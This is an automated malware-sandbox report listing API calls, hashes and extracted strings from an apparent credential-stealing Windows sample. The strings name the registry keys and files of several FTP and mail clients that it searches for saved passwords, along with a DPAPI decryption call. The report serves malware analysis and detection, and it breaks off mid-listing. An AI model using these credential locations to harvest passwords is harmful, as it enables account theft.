                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEnumOpen
                                  • String ID: HostDirName$HostName$Password$Port$Username
                                  • API String ID: 1332880857-791697221
                                  • Opcode ID: ed1a78f567bba5513e538f33b54b899594b318d3a683722f5d5a443e5d84301a
                                  • Instruction ID: fc2fdb558613e9c2e8b18701f4f9e27659267ba30ef1847d2d636ab8c18341a6
                                  • Opcode Fuzzy Hash: ed1a78f567bba5513e538f33b54b899594b318d3a683722f5d5a443e5d84301a
                                  • Instruction Fuzzy Hash: D641C33594011CBADF227B61CC42BDC7ABABF44344F10C5BAB554740F1DB7A5AA1AF88
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,?,?,00409CB2,00000800,?,?), ref: 004018DD
                                  • InternetCrackUrlA.WININET(?,00000000,80000000,0000003C), ref: 00403C6B
                                  • InternetCreateUrlA.WININET(0000003C,80000000,?,00001FFF), ref: 00403C96
                                  • InternetCrackUrlA.WININET(?,00000000,00000000,0000003C), ref: 00403CDC
                                  • wsprintfA.USER32 ref: 00403CFB
                                  • lstrlen.KERNEL32(?,00002000,00002000), ref: 00403D1E
                                  • closesocket.WSOCK32(?,?,00002000,00002000), ref: 00403D48
                                  Strings
                                  • GET %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98), xrefs: 00403CF3
                                  • <, xrefs: 00403CB6
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$Crack$AllocCreateLocalclosesocketlstrlenwsprintf
                                  • String ID: <$GET %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
                                  • API String ID: 4072649068-555445111
                                  • Opcode ID: d130731f34a3b94161e20c95310ad3c322741596d93f1b90e16a7e951fdeb8fd
                                  • Instruction ID: 2c93f55174f4879a4db6f1b7e4dd790b8fca9e33e28acec0cc160ac5bd5080f0
                                  • Opcode Fuzzy Hash: d130731f34a3b94161e20c95310ad3c322741596d93f1b90e16a7e951fdeb8fd
                                  • Instruction Fuzzy Hash: 7041F672D04209EAEF11AFA1CC41BEDBEBAFF04305F10403AF510B52A1D7B95A569B19
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegOpenKeyA.ADVAPI32(?,?), ref: 0040D5D6
                                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040D60A
                                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040D78D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEnumOpen
                                  • String ID: Host$Pass$Port$Remote Dir$User
                                  • API String ID: 1332880857-1775099961
                                  • Opcode ID: 06c24aab3cc60c9618c4b68d0beec38cc4d58499c4810707396707e3d137af77
                                  • Instruction ID: 1fd05541a01a89dffe010ef35692abe6d580daf26f61a96ca8e157ebfd96a9e0
                                  • Opcode Fuzzy Hash: 06c24aab3cc60c9618c4b68d0beec38cc4d58499c4810707396707e3d137af77
                                  • Instruction Fuzzy Hash: 0641F435940118BADF227B61CD02FDC7ABABF44304F10C5B6B548740B1DB7A5A91AF98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • StrStrIA.SHLWAPI(006538A0,BlazeFtp), ref: 0040C84A
                                    • Part of subcall function 0040242B: lstrlen.KERNEL32(?,?,00000000,?,?,?,00409C6E,00000000,00000000,?,?,PathToExe,00000000,?,?), ref: 0040243F
                                    • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?,?,00000000,?,?,?,00409C6E,00000000,00000000,?,?,PathToExe,00000000,?), ref: 0040245E
                                    • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?,?,00000000,?,?,?,00409C6E,00000000,00000000,?,?), ref: 00402470
                                    • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?,?,00000000,?,?,?,00409C6E,00000000,00000000,?), ref: 00402482
                                    • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,00409D40,?,00000800), ref: 004018C4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$FreeLocal
                                  • String ID: BlazeFtp$LastAddress$LastPassword$LastPort$LastUser$Software\FlashPeak\BlazeFtp\Settings$\BlazeFtp$site.dat
                                  • API String ID: 1884169789-2976447346
                                  • Opcode ID: ae093b6bff5ca0c5b1d4e090b68d8da58981395d3c3b6306a65141b71550af0c
                                  • Instruction ID: 2aaa60dbd0995c362339c6ee2767abb90b7bbf48d78d9c31007efe50a139024b
                                  • Opcode Fuzzy Hash: ae093b6bff5ca0c5b1d4e090b68d8da58981395d3c3b6306a65141b71550af0c
                                  • Instruction Fuzzy Hash: DA311731940109BADF127BA1CC42FEE7E72AF80744F10863BB514351F1D7B99A919B8C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • StrStrIA.SHLWAPI(006538A0,CUTEFTP), ref: 004053EA
                                    • Part of subcall function 0040242B: lstrlen.KERNEL32(?,?,00000000,?,?,?,00409C6E,00000000,00000000,?,?,PathToExe,00000000,?,?), ref: 0040243F
                                    • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?,?,00000000,?,?,?,00409C6E,00000000,00000000,?,?,PathToExe,00000000,?), ref: 0040245E
                                    • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?,?,00000000,?,?,?,00409C6E,00000000,00000000,?,?), ref: 00402470
                                    • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?,?,00000000,?,?,?,00409C6E,00000000,00000000,?), ref: 00402482
                                    • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,00409D40,?,00000800), ref: 004018C4
                                  Strings
                                  • CUTEFTP, xrefs: 004053E4
                                  • \sm.dat, xrefs: 004053FE
                                  • Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar, xrefs: 00405461
                                  • Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar, xrefs: 00405454
                                  • Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar, xrefs: 00405447
                                  • Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar, xrefs: 00405488
                                  • Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar, xrefs: 0040547B
                                  • Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar, xrefs: 0040546E
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$FreeLocal
                                  • String ID: CUTEFTP$Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar$Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar$Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar$\sm.dat
                                  • API String ID: 1884169789-2738976122
                                  • Opcode ID: 66253efcd63ede11217a1e00eff473e80b472c1a3d08af9bd3496867775e6461
                                  • Instruction ID: d288d778f3b0420d84bf39ae9e8e3b7741dd64c7b166df527bd21b083190309a
                                  • Opcode Fuzzy Hash: 66253efcd63ede11217a1e00eff473e80b472c1a3d08af9bd3496867775e6461
                                  • Instruction Fuzzy Hash: 6011F174550A04BADF123F21CC02FDE3E61EB91785F10413AB9087C0E6DBB98A919E9C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,?,?,00409CB2,00000800,?,?), ref: 004018DD
                                  • StrStrIA.SHLWAPI(?,Content-Length:), ref: 00403B00
                                  • lstrlen.KERNEL32(Content-Length:,00000000,?,Content-Length:), ref: 00403B11
                                  • StrToIntA.SHLWAPI(00000001,00000001,00000000,Content-Length:,00000000,?,Content-Length:), ref: 00403B32
                                  • StrStrIA.SHLWAPI(?,Location:,?,Content-Length:), ref: 00403B49
                                  • lstrlen.KERNEL32(Location:,00000000,?,Location:,?,Content-Length:), ref: 00403B5A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$AllocLocal
                                  • String ID: Content-Length:$Location:
                                  • API String ID: 2140729754-2400408565
                                  • Opcode ID: f9856d7c2d3673765c95f20da010847e61cce321201616afbab6dace1773fc4a
                                  • Instruction ID: 887c3a052e585dbf08982f6133b0250286a7e5dbb1d34c025ab1b04810de1b55
                                  • Opcode Fuzzy Hash: f9856d7c2d3673765c95f20da010847e61cce321201616afbab6dace1773fc4a
                                  • Instruction Fuzzy Hash: 9541D731A04249BBDB10AFA5CC45F9DFF79EF80309F208177B510B52D1C7799A51DA54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegOpenKeyA.ADVAPI32(?,?), ref: 00406D65
                                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406D99
                                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406F3A
                                    • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,00409D40,?,00000800), ref: 004018C4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEnumFreeLocalOpen
                                  • String ID: Hostname$Password$Port$Username
                                  • API String ID: 3369285772-1811172798
                                  • Opcode ID: 2d1c301d33676c17d4327802681ab84deea955bf4b1c5a3466b8e53e323952d8
                                  • Instruction ID: 500b27a2afeee4adcaf2e15fb58aabb2ec7cde25314abd0c379f5f2d99b47613
                                  • Opcode Fuzzy Hash: 2d1c301d33676c17d4327802681ab84deea955bf4b1c5a3466b8e53e323952d8
                                  • Instruction Fuzzy Hash: 6041043590011CEADF216B61CC02BEDBAB9BF44304F10C5BAB149740F1DB7A5BA1AF99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegOpenKeyA.ADVAPI32(?,?), ref: 00406B31
                                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406B65
                                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406CDA
                                    • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,00409D40,?,00000800), ref: 004018C4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEnumFreeLocalOpen
                                  • String ID: FtpPort$Password$Server$Username
                                  • API String ID: 3369285772-1828875246
                                  • Opcode ID: 609b2b3588d22befb3fe2b0cf784281240d124bdd94b142eea3fa9e0900c5d9f
                                  • Instruction ID: 7ba9846cf84e593e36bc471b668ef0c5a307549365de809292626744771520ce
                                  • Opcode Fuzzy Hash: 609b2b3588d22befb3fe2b0cf784281240d124bdd94b142eea3fa9e0900c5d9f
                                  • Instruction Fuzzy Hash: BE41F43194011CEADF21AB61CC02BDD7AB9FF44304F10C5BAB549740F1DB795AA1AF98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040E247
                                  • RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,?,?,Folder,00000000,?,?,Port,00000000,?,?), ref: 0040E377
                                    • Part of subcall function 004043DC: CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 00404428
                                    • Part of subcall function 004043DC: LocalFree.KERNEL32(00000000), ref: 0040445C
                                    • Part of subcall function 004015CB: lstrlen.KERNEL32(00000000,?,00409772,?,00000000,?,BEEF0000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 004015D7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseCryptDataFreeLocalOpenUnprotectlstrlen
                                  • String ID: Folder$Port$Site$UserID$xflags
                                  • API String ID: 2167297517-269738940
                                  • Opcode ID: 139f014af5669faa08ff174937d94fa0d905d04d341bd79ec540fcd67cec1d20
                                  • Instruction ID: 29f1f953e1c0832a404ddd4bf1eb832a089b214c1547d71922d0550bed25c438
                                  • Opcode Fuzzy Hash: 139f014af5669faa08ff174937d94fa0d905d04d341bd79ec540fcd67cec1d20
                                  • Instruction Fuzzy Hash: 7E31A73591010ABADF126F92CC02FEEBF76AF04344F10853AB920751F1D77A9A60EB48
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 004078DB
                                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040790F
                                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407A2A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEnumOpen
                                  • String ID: DataDir$InstallPath$sites.dat$sites.ini
                                  • API String ID: 1332880857-3870687875
                                  • Opcode ID: b0ed473e7b8700ff30b45b365e22d18518b69f4eb68bba23308813eacdd9ac23
                                  • Instruction ID: e7b8c0c935d4d0c454aa1f99ca68a1ed178d52b45ef830c738b4bbc260966493
                                  • Opcode Fuzzy Hash: b0ed473e7b8700ff30b45b365e22d18518b69f4eb68bba23308813eacdd9ac23
                                  • Instruction Fuzzy Hash: 4531F43194011CFADF216B51CC42FDD7ABABF40304F14C0BABA54740A1CBB96B91AF99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • StrStrA.SHLWAPI(006538A0,unleap.exe), ref: 00407AB1
                                  • lstrlen.KERNEL32(unleap.exe,00000001,006538A0,unleap.exe), ref: 00407ACA
                                    • Part of subcall function 0040242B: lstrlen.KERNEL32(?,?,00000000,?,?,?,00409C6E,00000000,00000000,?,?,PathToExe,00000000,?,?), ref: 0040243F
                                    • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?,?,00000000,?,?,?,00409C6E,00000000,00000000,?,?,PathToExe,00000000,?), ref: 0040245E
                                    • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?,?,00000000,?,?,?,00409C6E,00000000,00000000,?,?), ref: 00402470
                                    • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?,?,00000000,?,?,?,00409C6E,00000000,00000000,?), ref: 00402482
                                    • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,00409D40,?,00000800), ref: 004018C4
                                  • StrStrIA.SHLWAPI(00653BC0,leapftp,006538A0,unleap.exe), ref: 00407B0E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$FreeLocal
                                  • String ID: SOFTWARE\LeapWare$leapftp$sites.dat$sites.ini$unleap.exe
                                  • API String ID: 1884169789-1497043051
                                  • Opcode ID: 954d4c732ee81bd768cb11f8ca884f8911c33a3053e45667c97a0495e652935b
                                  • Instruction ID: 386b857961e923e72b6bd9048734cec28c80f28d71c9641b52c3ac27aeea778a
                                  • Opcode Fuzzy Hash: 954d4c732ee81bd768cb11f8ca884f8911c33a3053e45667c97a0495e652935b
                                  • Instruction Fuzzy Hash: 0C217571A48104BDEF113B22CC02FEE7E1ADB81748F244437B905B51E2C7BDAB91969D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,00409D40,?,00000800), ref: 004018C4
                                  • wsprintfA.USER32 ref: 0040F041
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeLocalwsprintf
                                  • String ID: Count$Default$Dir #%d$ProgramDir$Software\RIT\The Bat!$Software\RIT\The Bat!\Users depot$Working Directory
                                  • API String ID: 988369812-1921698578
                                  • Opcode ID: c69ef0954902c4713d423042458d5ad8077758b8e240eb6b0a7ef15e578b7c8b
                                  • Instruction ID: cd3023906f6ae057e5bdde1cd0ba176c3d04abf87e76bd78a7c681664f89a6ca
                                  • Opcode Fuzzy Hash: c69ef0954902c4713d423042458d5ad8077758b8e240eb6b0a7ef15e578b7c8b
                                  • Instruction Fuzzy Hash: 50313A34E40209FADF11AFA1DC42EEE7A75AF00304F6085B7F410B51E1DB798BA5AB48
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,?,?,00409CB2,00000800,?,?), ref: 004018DD
                                  • GetWindowsDirectoryA.KERNEL32(?,00000104,00000105), ref: 00404C7B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocDirectoryLocalWindows
                                  • String ID: FtpIniName$InstallDir$Software\Ghisler\Total Commander$Software\Ghisler\Windows Commander$\GHISLER
                                  • API String ID: 3186838798-3636168975
                                  • Opcode ID: ef3b3502fb2b41770627f5bdeeceae28a7c7f784a850272df819c325c99e2828
                                  • Instruction ID: 43e3b734b20d4af43a7562869c4868c7ee74a92454cd73f3ffe9b37604960ea0
                                  • Opcode Fuzzy Hash: ef3b3502fb2b41770627f5bdeeceae28a7c7f784a850272df819c325c99e2828
                                  • Instruction Fuzzy Hash: E841EEB4A80608BAEF123B62CC43FDD7A66DF80744F60857B7A10750F2DABD99509A5C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegOpenKeyA.ADVAPI32(?,?), ref: 00404931
                                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00404965
                                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00404A8C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEnumOpen
                                  • String ID: HostName$Password$User
                                  • API String ID: 1332880857-1253078594
                                  • Opcode ID: 29610bbe371f7ec93e2db256f06eef0813d37fe8d0a7f9e87bc00191c95d17d7
                                  • Instruction ID: 70a3f47a41d3c5b7bb25802f3bcf3ab2eab4f79ca17ead1258ab74d3b4d68c93
                                  • Opcode Fuzzy Hash: 29610bbe371f7ec93e2db256f06eef0813d37fe8d0a7f9e87bc00191c95d17d7
                                  • Instruction Fuzzy Hash: B131F37594011CBADF22AB61CC02BDD7ABABF84304F10C4BAB544750F1DB795B92AF88
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00408E20
                                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00408E54
                                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00408F46
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEnumOpen
                                  • String ID: wiseftp.ini$wiseftpsrvs.bin$wiseftpsrvs.ini
                                  • API String ID: 1332880857-3184955129
                                  • Opcode ID: a4bba759f4ed4e47f8b2ec628edc0a6785b33be182757597579aabc9bb5388c1
                                  • Instruction ID: 379df70dab51ed1233c69cde4acd9fbee75a0c7acd1daed002fcfe2591656a96
                                  • Opcode Fuzzy Hash: a4bba759f4ed4e47f8b2ec628edc0a6785b33be182757597579aabc9bb5388c1
                                  • Instruction Fuzzy Hash: 9031E33190010DBADF21AB61CD42FDD7ABABF40304F1084BAB654B41E1DE799B91AF98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • 756FE550.OLE32(004162BF,00000000,00000005,004162CF,?), ref: 0040A88D
                                  • StrStrIW.SHLWAPI(00000000,004162EF), ref: 0040A904
                                  • 757283B0.OLE32(00000000,00000000,004162EF), ref: 0040A92F
                                  • 757283B0.OLE32(00000000,00000000,00000000,004162EF), ref: 0040A93D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: 757283$E550
                                  • String ID: ($http://www.facebook.com/
                                  • API String ID: 1310012808-3677894361
                                  • Opcode ID: e4386c61c5d52dae3f91afb7c524ba0f41b393633d994220be84190847cd43a6
                                  • Instruction ID: fb31eb5c0df78cdbf00d2063a309b2630a064c869b031c3f749717a331f3c059
                                  • Opcode Fuzzy Hash: e4386c61c5d52dae3f91afb7c524ba0f41b393633d994220be84190847cd43a6
                                  • Instruction Fuzzy Hash: 5D312A70A00209EBDF119F94C889FDEFB75BF44314F208566E40076290D3799E95DB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetCurrentDirectoryA.KERNEL32(00000104,?,0000001A), ref: 00409E28
                                  • SetCurrentDirectoryA.KERNEL32(?,?,80000002,Software\Mozilla,Firefox,\Mozilla\Firefox\,?,Software\Mozilla,Firefox,\Mozilla\Firefox\,00000104,?,0000001A), ref: 00409E6D
                                    • Part of subcall function 00401E4C: lstrlen.KERNEL32(00000000,?,?,00409D0C,00000000,?,?,00414845,?,?,?,?,00000000,00000000,00000000,00000000), ref: 00401E6D
                                    • Part of subcall function 00401E4C: lstrlen.KERNEL32(00000000,00000000,?,?,00409D0C,00000000,?,?,00414845,?,?,?,?,00000000,00000000,00000000), ref: 00401E77
                                    • Part of subcall function 00401E4C: lstrcpy.KERNEL32(00000000,00000000), ref: 00401E8B
                                    • Part of subcall function 00401E4C: lstrcat.KERNEL32(00000000,00000000), ref: 00401E94
                                    • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,00409D40,?,00000800), ref: 004018C4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CurrentDirectorylstrlen$FreeLocallstrcatlstrcpy
                                  • String ID: Firefox$Software\Mozilla$\Mozilla\Firefox\$fireFTPsites.dat
                                  • API String ID: 3007406096-624000163
                                  • Opcode ID: cab5244099b8839801ee751b09e3e1bf09996c6277ee9fb34ce1f2b5b50914e8
                                  • Instruction ID: 7ca379dd8bd6ced9b34700e741701d984c4c6656734aaf013cc51c489d735693
                                  • Opcode Fuzzy Hash: cab5244099b8839801ee751b09e3e1bf09996c6277ee9fb34ce1f2b5b50914e8
                                  • Instruction Fuzzy Hash: E1011E70680209BADF21BB61CC47FDE3A699B44744F11807E7A04B51E3DFB9CA909A9D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 00409C3C: StrStrIA.SHLWAPI(?,?), ref: 00409C48
                                    • Part of subcall function 00409C3C: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409CBF
                                    • Part of subcall function 00409C3C: RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000,00000800,?,?), ref: 00409CEB
                                    • Part of subcall function 00409C3C: RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,00414845,?,?), ref: 00409D33
                                  • SetCurrentDirectoryA.KERNEL32(?,?,80000002,Software\Mozilla,Thunderbird,\Thunderbird,?,Software\Mozilla,Thunderbird,\Thunderbird,00400686,?,C0000000,00000003,00000000,00000002), ref: 0040F892
                                  • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,80000002,Software\Mozilla,Thunderbird,\Thunderbird,?,Software\Mozilla,Thunderbird,\Thunderbird,00400686,?,C0000000,00000003), ref: 0040F8AD
                                  • SetCurrentDirectoryA.KERNEL32(?,?,80000002,Software\Mozilla,Thunderbird,\Thunderbird,?,Software\Mozilla,Thunderbird,\Thunderbird,00000104,?,?,?,80000002,Software\Mozilla), ref: 0040F8F2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CurrentDirectory$CloseEnumOpen
                                  • String ID: Software\Mozilla$Thunderbird$\Thunderbird
                                  • API String ID: 3062143572-138716004
                                  • Opcode ID: 1d0fe061839307b218360c53ccdec1b1f61c1031d7dfb8cf8e24b9e4fc1048e5
                                  • Instruction ID: d4d86ee1889f56e53b41f80411ade8ef6cf2cf6312bde319bd3c2d7966aa0224
                                  • Opcode Fuzzy Hash: 1d0fe061839307b218360c53ccdec1b1f61c1031d7dfb8cf8e24b9e4fc1048e5
                                  • Instruction Fuzzy Hash: 61011D35788208BADF51BB61CC43FCC7AB59B10748F508467BA48701E3CBFD8AD59A48
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 00409C3C: StrStrIA.SHLWAPI(?,?), ref: 00409C48
                                    • Part of subcall function 00409C3C: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409CBF
                                    • Part of subcall function 00409C3C: RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000,00000800,?,?), ref: 00409CEB
